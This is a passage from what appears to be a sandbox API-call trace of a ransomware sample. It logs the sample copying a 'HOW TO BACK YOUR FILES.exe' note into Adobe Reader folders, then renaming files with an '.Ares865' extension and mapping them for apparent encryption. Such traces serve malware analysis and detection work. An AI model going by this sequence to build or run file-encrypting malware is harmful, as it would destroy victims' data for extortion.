10.0\\Resource\\Linguistics\\Providers" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers" [0058.296] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.296] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.300] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.300] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.301] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.301] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.301] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity" [0058.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0058.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0058.301] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity") returned 81 [0058.301] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity" [0058.301] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.301] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.306] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.306] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.307] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.307] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.307] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00" [0058.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0058.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0058.307] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00") returned 87 [0058.307] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00" [0058.307] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.307] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.313] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.313] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54438700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54438700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.314] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.314] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.314] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\araphon.env.Ares865") returned 107 [0058.315] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\araphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\araphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\araphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\araphon.env.ares865"), dwFlags=0x1) returned 1 [0058.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\araphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\araphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.316] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=15600) returned 1 [0058.316] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.316] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.316] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.316] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.317] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.317] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.317] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3ff0, lpName=0x0) returned 0x15c [0058.319] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ff0) returned 0x190000 [0058.320] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.322] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.322] CloseHandle (hObject=0x15c) returned 1 [0058.322] CloseHandle (hObject=0x118) returned 1 [0058.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.324] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df2be60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x128c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt.fca", cAlternateFileName="")) returned 1 [0058.324] lstrcmpiW (lpString1="brt.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.324] lstrcmpiW (lpString1="brt.fca", lpString2="aoldtz.exe") returned 1 [0058.324] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bulphon.env.Ares865") returned 107 [0058.324] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bulphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bulphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bulphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bulphon.env.ares865"), dwFlags=0x1) returned 1 [0058.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bulphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bulphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.326] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5168) returned 1 [0058.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.326] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.327] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.327] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.327] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1730, lpName=0x0) returned 0x15c [0058.328] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1730) returned 0x190000 [0058.330] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.330] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.330] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.331] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.331] CloseHandle (hObject=0x15c) returned 1 [0058.331] CloseHandle (hObject=0x118) returned 1 [0058.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.333] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df78120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="can.fca", cAlternateFileName="")) returned 1 [0058.333] lstrcmpiW (lpString1="can.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.333] lstrcmpiW (lpString1="can.fca", lpString2="aoldtz.exe") returned 1 [0058.334] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\danphon.env.Ares865") returned 107 [0058.334] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\danphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\danphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\danphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\danphon.env.ares865"), dwFlags=0x1) returned 1 [0058.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\danphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\danphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.335] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2809) returned 1 [0058.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.336] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.336] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.336] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.336] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe00, lpName=0x0) returned 0x15c [0058.338] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe00) returned 0x190000 [0058.386] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.387] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.387] CloseHandle (hObject=0x15c) returned 1 [0058.387] CloseHandle (hObject=0x118) returned 1 [0058.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.389] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc7e5a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x51c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut.fca", cAlternateFileName="")) returned 1 [0058.389] lstrcmpiW (lpString1="dut.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.389] lstrcmpiW (lpString1="dut.fca", lpString2="aoldtz.exe") returned 1 [0058.389] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\engphon.env.Ares865") returned 107 [0058.389] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\engphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\engphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\engphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\engphon.env.ares865"), dwFlags=0x1) returned 1 [0058.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\engphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\engphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2467) returned 1 [0058.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.391] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.392] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcb0, lpName=0x0) returned 0x15c [0058.393] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcb0) returned 0x190000 [0058.394] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.395] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.396] CloseHandle (hObject=0x15c) returned 1 [0058.396] CloseHandle (hObject=0x118) returned 1 [0058.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.397] HeapFree (in: hHeap=0x2b0000, 